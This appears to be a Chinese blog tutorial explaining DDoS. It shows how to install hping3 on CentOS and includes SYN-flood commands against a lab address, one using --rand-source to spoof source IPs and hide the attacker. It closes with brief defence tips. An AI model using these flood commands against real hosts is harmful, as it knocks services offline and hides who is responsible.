前言：电影院如期开放，据前线消息，人实在是少，有些场次一个人看一场，在华夏有电影院开始，应该都少有这种场景吧，再次希望疫情早日散去，在此引用一句话来配合一次图：“直到乌云散去风雨落幕，我们一起走向未来。”

一，什么是DDoS攻击

分布式拒绝服务攻击(英文意思是Distributed Denial of Service，简称DDoS)是指处于不同位置的多个攻击者同时向一个或数个目标发动攻击，或者一个攻击者控制了位于不同位置的多台机器并利用这些机器对受害者同时实施攻击。由于攻击的发出点是分布在不同地方的，这类攻击称为分布式拒绝服务攻击，其中的攻击者可以有多个。

常见的DDOS攻击手段有SYN Flood、ACK Flood、UDP Flood、ICMP Flood、TCP Flood、Connections Flood、Script Flood、Proxy Flood等

二，利用hping3工具DOS攻击实验

1，准备：

需要两台机器，一台扮演攻击源，另一做目标源。

攻击源地址(我这用centos7虚拟机):192.168.142.128

被攻击机器地址(我这用本机):192.168.1.114

2，准备软件

• centos7.x系统

• winshake抓包软件/linux下可以用tcpdump

• hping3软件

3,软件安装，

winshake 可以在官网下载对应

https://www.wireshark.org/download.html

linux下安装hping3软件和tcpdump如下：

 #yum安装tcpdump yum install tcpdump -y

#源码安装hping3#安装依赖yum install -y libpcap libpcap-devel tcl tcl-devel gccwget http://www.hping.org/hping3-20051105.tar.gztar -xzvf hping3-20051105.tar.gz && cd hping3-20051105./configuremakemake instal

这里有几个安装问题需要注意下：

1，因为我的centos7虚机镜像是3.10.0-229.el7.x86_64，64位的操作系统，而bytesex.h没有对64位的支持，所以./configure时会报“build byteorder.c时出现如下错误”

解决：在解压目录编辑bytesex.h，指定位置加上|| defined(__x86_64__)\

vim hping3-20051105/bytesex.h#在defined(__i386__) \后面加上下面这行|| defined(__x86_64__)\

2，报错libpcap_stuff.c:20:21: fatal error: net/bpf.h: No such file or directory

这是因为安装pcap库后没做软链接，解决如下：

ln -sf /usr/include/pcap-bpf.h /usr/include/net/bpf.h

3，报错Can't install the man page: /usr/local/confd/man/man8 does not exist

解决：手动创建/usr/local/confd/man/man8目录

mkdir -p /usr/local/confd/man/man8#如果已经make install,还需要执行下面三句才能重新make installrm -rf /usr/sbin/hping3rm -rf /usr/sbin/hpingrm -rf /usr/sbin/hping2#最后执行make install

如上解决完，执行hping3 -help，如下图，代表软件已经安装成功

三，DDoS攻击实践

1，在攻击源，也就是我的虚拟机端输入如下命令，这里两个命令唯一的区别是--rand-source参数，目标机器会看到一堆ip，不能定位你的实际IP。

hping3 -c 5000 -d 150 -S -w 64 -p 80 --flood 192.168.1.114hping3 -c 5000 -d 150 -S -w 64 -p 80 --flood --rand-source 192.168.1.114#命令解释-c：发送数据包的个数-d：每个数据包的大小-S：发送SYN数据包-w：TCP window大小-p：目标端口，你可以指定任意端口–flood：尽可能快的发送数据包–rand-source：使用随机的IP地址，目标机器看到一堆ip，不能定位你的实际IP；也可以使用-a或–spoof隐藏主机名

实际观察下两个命令的效果

(1)hping3 -c 5000 -d 150 -S -w 64 -p 80 --flood 192.168.1.114

打开winshake，查看抓包情况

(2)hping3 -c 5000 -d 150 -S -w 64 -p 80 --flood --rand-source 192.168.1.114

可以看出，攻击者ip已经被隐藏

四，ddos攻击预防

小编认为，想完全防御住ddos的攻击并不现实的，不过我们可以做到如下几点来有限的限制ddos攻击的损害

1，尽量避免NAT的使用

2，充足的网络带宽保证

3，把网站做成静态页面

4，设定路由器的过滤功能来防止

5，网络设备或主机都需要随时更新其系统漏洞、关闭不需要的服务、安装必要的防 毒和防火墙软件、随时注意系统安全，避免被黑客和自动化的 DDoS 程序植入攻击程序

6，通过隐藏源IP方式可以实现，前提是要先找一个高防的盾机，再把IP隐藏起来(小编认为最有效的是这种方法，不过前提是需要一台服务器)

五，总结

目前开源的ddos攻击工具有很多(攻击成本低，也是DDOS攻击易于发生的原因之一)，但DDOS攻击防御工具并不多，所以作为个人，我们应该定期维护好自己的设备，比如定时更新或者开启防火墙规则，避免被人植入木马，从而成为洪水攻击的帮凶

最后的最后，欢迎交流：

关注公众号留言，或者在下方直接留言：